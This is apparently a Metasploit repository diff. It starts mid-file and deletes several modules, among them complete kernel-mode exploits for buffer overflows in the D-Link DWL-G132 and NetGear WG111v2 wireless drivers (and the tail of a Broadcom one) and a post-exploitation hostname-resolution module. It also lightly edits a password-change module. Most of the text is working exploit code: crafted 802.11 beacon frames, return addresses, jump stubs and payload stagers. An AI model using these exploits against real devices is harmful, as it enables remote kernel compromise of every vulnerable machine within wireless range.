0x804dbb27, - - } - } - } - ], - - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 11 2006' - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - - print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - - select(nil, nil, nil, 0.02) - wifi.write(create_response) - - select(nil, nil, nil, 0.01) - wifi.write(create_beacon) - - break if session_created? - - end - - print_status("Finished sending frames...") - end - - def create_beacon - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton('FF:FF:FF:FF:FF:FF') - seq = [Time.now.to_i % 4096].pack('n') - - blob = create_frame - blob[0,1] = 0x80.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src - blob[22,2] = seq - - blob - end - - def create_response - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton(datastore['ADDR_DST']) - seq = [Time.now.to_i % 256].pack('n') - - blob = create_frame - blob[0,1] = 0x50.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. - blob[22,2] = seq - - blob - end - - def create_frame - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - "\x58\x58\x58\x58\x58\x58" + # src - "\x58\x58\x58\x58\x58\x58" + # bssid - "\x70\xed" + # sequence number - - # - # fixed parameters - # - - # timestamp value - rand_text_alphanumeric(8) + - "\x64\x00" + # beacon interval - "\x11\x04" + # capability flags - - # - # tagged parameters - # - - # ssid tag - "\x00" + # tag: SSID parameter set - "\x5d" + # len: length is 93 bytes - - # jump into the payload - "\x89\xf9" + # mov edi, ecx - "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b - "\xff\xe1" + # jmp ecx - - # padding - rand_text_alphanumeric(79) + - - # return address - [target.ret].pack('V') + - - # vendor specific tag - "\xdd" + # wpa - "\xff" + # big as we can make it - - # the kernel-mode stager - payload.encoded - end - -end diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb deleted file mode 100644 index 5184b77bc4..0000000000 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ /dev/null @@ -1,195 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow - allows remote code execution in kernel mode. The stack buffer overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the - DWL-G132 driver (v1.21). - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'hdm', # discovery, exploit dev - 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-6055'], - ['OSVDB', '30296'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'], - ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - - 'Payload' => - { - # Its a beautiful day in the neighborhood... - 'Space' => 1000 - }, - 'Platform' => 'win', - 'Targets' => - [ - # Windows XP SP2 with the latest updates - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - } - } - } - ], - - # Windows XP SP2 install media, no patches - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 13 2006')) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(create_beacon) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - - count += 1 - - # Exit if we get a session - break if session_created? - end - - print_status("Completed sending beacons.") - end - - -# -# The following research was provided by Gil Dabah of ZERT -# -# The long rates field bug can be triggered three different ways (at least): -# 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data -# 3) Send two IE rates fields, with the second one containing the long data (this exploit) -# - - def create_beacon - - ssid = rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + rand_text(4) - src = ("\x90" * 4) + "\xeb\x2b" - seq = [rand(255)].pack('n') - - buff = rand_text(75) - buff[0, 2] = "\xeb\x49" - buff[71, 4] = [target.ret].pack('V') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - src + # src - bssid + # bssid - seq + # seq - rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x00\x05" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr + - - # eip was his name-o - "\x01" + buff.length.chr + buff + - - payload.encoded - - return frame - end - -end diff --git a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb deleted file mode 100644 index 05b705e909..0000000000 --- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb +++ /dev/null @@ -1,208 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the NetGear WG111v2 wireless - device driver. This stack buffer overflow allows remote code execution in kernel mode. - The stack buffer overflow is triggered when a 802.11 Beacon frame is received that - contains more than 1100 bytes worth of information elements. - - This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and - a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:18:4d:02:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then unplugging and reinserting the USB card. The exploit can - take up to a minute to execute the payload, depending on system activity. - - NetGear was NOT contacted about this flaw. A search of the SecurityFocus - database indicates that NetGear has not provided an official patch or - solution for any of the thirty flaws listed at the time of writing. This list - includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, - 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, - 16835, 19468, and 19973. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-5972'], - ['OSVDB', '30473'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - # Its a beautiful day in the neighborhood... - 'Space' => 1000, - }, - 'Platform' => 'win', - 'Targets' => - [ - # Windows XP SP2 with the latest updates - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316', - { - 'Ret' => 0x80502d7f, # jmp esp - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - } - } - } - ], - - # Windows XP SP2 install media, no patches - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316', - { - 'Ret' => 0x804ed5cb, # jmp esp - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 16 2006')) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(create_beacon) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - - count += 1 - - # Exit if we get a session - break if session_created? - end - - print_status("Completed sending beacons.") - end - - # Convert arbitrary data into a series of information elements - def ie_padding(data) - ret = 0 - idx = 0 - len = 0 - - while(idx < data.length) - len = data[idx+1] - if (! len) - data << "\x00" - len = 0 - end - - idx += len + 2 - end - - data << yield(idx - data.length) - end - - def create_beacon - - ssid = rand_text_alphanumeric(16) - bssid = ("\x00" * 2) + rand_text(4) - src = ("\x00" * 2) + rand_text(4) - seq = [rand(255)].pack('n') - stamp = rand_text(8) - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - src + # src - bssid + # bssid - seq + # seq - stamp + # timestamp value - "\x64\x00" + # beacon interval - rand_text(2) + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr - - # Bounce through EDI to the uncorrupted payload - jumper = - "\x6a\x39" + # push byte +0x39 - "\x58" + # pop eax - "\x01\xc7" + # add edi, eax - "\xff\xe7" # jmp edi - - # Overwrite enough to pop the return - buf = rand_text(1160) - - # Kernel-mode stager fun goes here - buf[0, payload.encoded.length] = payload.encoded - - # Return address is a jmp ESP - buf[1101, 4] = [ target.ret ].pack('V') - - # Jump back to EDI + 0x39 - buf[1113, jumper.length] = jumper - - # Pad it out to be a valid set of IEs - frame << ie_padding(buf) {|c| rand_text(c) } - - return frame - end - -end diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 6099b90013..80d085053e 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -11,10 +11,11 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => "Windows Manage Change Password", 'Description' => %q{ - This module will attempt to change the password of the targetted account. - Its main purpose is when you have valid credentials on a remote host but - they require a password change before you can login e.g. - 'System error 1907 has occurred.' + This module will attempt to change the password of the targeted account. + The typical usage is to change a newly created account's password on a + remote host to avoid the error, 'System error 1907 has occurred,' which + is caused when the account policy enforces a password change before the + next login. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], @@ -33,7 +34,7 @@ class Metasploit3 < Msf::Post def run unless client.railgun - print_error('This module requires a native windows payload that supports railgun.') + print_error('This module requires a native Windows payload that supports Railgun.') return end diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb deleted file mode 100644 index 37befc65e2..0000000000 --- a/modules/post/windows/recon/resolve_hostname.rb +++ /dev/null @@ -1,79 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'rex' - -class Metasploit3 < Msf::Post - require 'msf/core/module/deprecated' - include Msf::Module::Deprecated - deprecated Date.new(2014, 03, 24), 'post/multi/gather/resolve_hosts' - - def initialize(info={}) - super( update_info( info, - 'Name' => 'Windows Recon Resolve Hostname', - 'Description' => %q{ - This module resolves a hostname to IP address via the victim, - similar to the Unix 'dig' command. Since resolution happens over - an established session from the perspective of the remote host, - this module can be used to determine differences between external - and internal resolution, especially for potentially high-value - internal addresses of devices named 'mail' or 'www.' - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'mubix' ], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) - - register_options( - [ - OptString.new('HOSTNAME', [false, 'Hostname to lookup', nil]), - OptPath.new('HOSTFILE', [false, 'Line separated file with hostnames to resolve', nil]), - OptBool.new('SAVEHOSTS', [true, 'Save resolved hosts to the database', true]) - ], self.class) - end - - def resolve_hostname(hostname) - begin - vprint_status("Looking up IP for #{hostname}") - result = client.net.resolve.resolve_host(hostname) - if result[:ip].nil? or result[:ip].blank? - print_error("Failed to resolve #{hostname}") - return - else - hostip = result[:ip] - end - - - print_status("#{hostname} resolves to #{hostip}") - - if datastore['SAVEHOSTS'] - report_host({ - :host => hostip, - :name => hostname - }) - end - - rescue Rex::Post::Meterpreter::RequestError - print_status('Windows 2000 and prior does not support getaddrinfo') - end - - end - - def run - if datastore['HOSTNAME'] - resolve_hostname(datastore['HOSTNAME']) - end - - if datastore['HOSTFILE'] - ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname| - if hostname.strip != "" - resolve_hostname(hostname.strip) - end - end - end - end -end